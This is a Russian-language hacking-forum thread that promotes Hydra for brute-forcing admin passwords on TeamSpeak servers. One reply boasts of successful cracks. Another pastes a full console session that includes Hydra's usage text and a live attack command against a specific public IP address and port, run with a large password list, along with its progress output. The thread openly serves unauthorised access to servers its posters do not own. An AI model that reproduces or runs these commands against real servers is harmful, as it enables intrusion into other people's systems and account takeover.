TeamSpeak BruteForce using Hydra Довольно-таки рабочий брут пароля админа/суперадмина TeamSpeak сервера !!! Качать Hydra Видео о настройке
На данный момент я пробовал брутить гидрой множество ТС. Из 15 пробрутилось только 3. Большинство пофиксили. Не могли бы вы выложить что-нибудь поновее. Заранее благодарю.
Помогите пожалуйста уважаемые хакеры! Пытался сделать все как в описании в конечном итоге пишет это: Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. C:\Documents and Settings\Андрей>cd "C:\Documents and Settings\Андрей\Рабочий стол\hydra" C:\Documents and Settings\Андрей\Рабочий стол\hydra>hydra Hydra v5.3 [http://www.thc.org] (c) 2006 by van Hauser / THC <[email protected]> Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] Options: -R restore a previous aborted/crashed session -S connect via SSL -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -e ns additional checks, "n" for null password, "s" try login as pass -C FILE colon seperated "loginass" format, instead of -L/-P options -M FILE server list for parallel attacks, one entry per line -o FILE write found login/password pairs to FILE instead of stdout -f exit after the first found login/password pair (per host if -M) -t TASKS run TASKS number of connects in parallel (default: 16) -w TIME defines the max wait time in seconds for responses (default: 30) -v / -V verbose mode / show login+pass combination for each attempt server the target server (use either this OR the -M option) service the service to crack. Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhereteamspeak sip vmauthd OPT some service modules need special input (see README!) Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy. Hydra is a tool to guess/crack valid login/password pairs - use allowed only for legal purposes! If used commercially, tool name, version and web address must be mentioned in the report. Find the newest version at http://www.thc.org C:\Documents and Settings\Андрей\Рабочий стол\hydra>hydra -l skert -P "C:\Documents and Settings\Андрей\Рабочий стол\hydra\7.txt" -s 8767 -v 90.189.192.126 teamspeak WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes. Hydra (http://www.thc.org) starting at 2004-07-30 22:28:52 [DATA] 16 tasks, 1 servers, 170636 login tries (l:1/p:170636), ~10664 tries per task [DATA] attacking service teamspeak on port 8767 [VERBOSE] Resolving addresses ... done [STATUS] 14792.00 tries/min, 14792 tries in 00:01h, 155844 todo in 00:11h [STATUS] 14931.67 tries/min, 44795 tries in 00:03h, 125841 todo in 00:09h [VERBOSE] Writing restore file... done [STATUS] 14941.43 tries/min, 104590 tries in 00:07h, 66046 todo in 00:05h [VERBOSE] Writing restore file... done [STATUS] attack finished for 90.189.192.126 (waiting for childs to finish) Hydra (http://www.thc.org) finished at 2004-07-30 22:40:21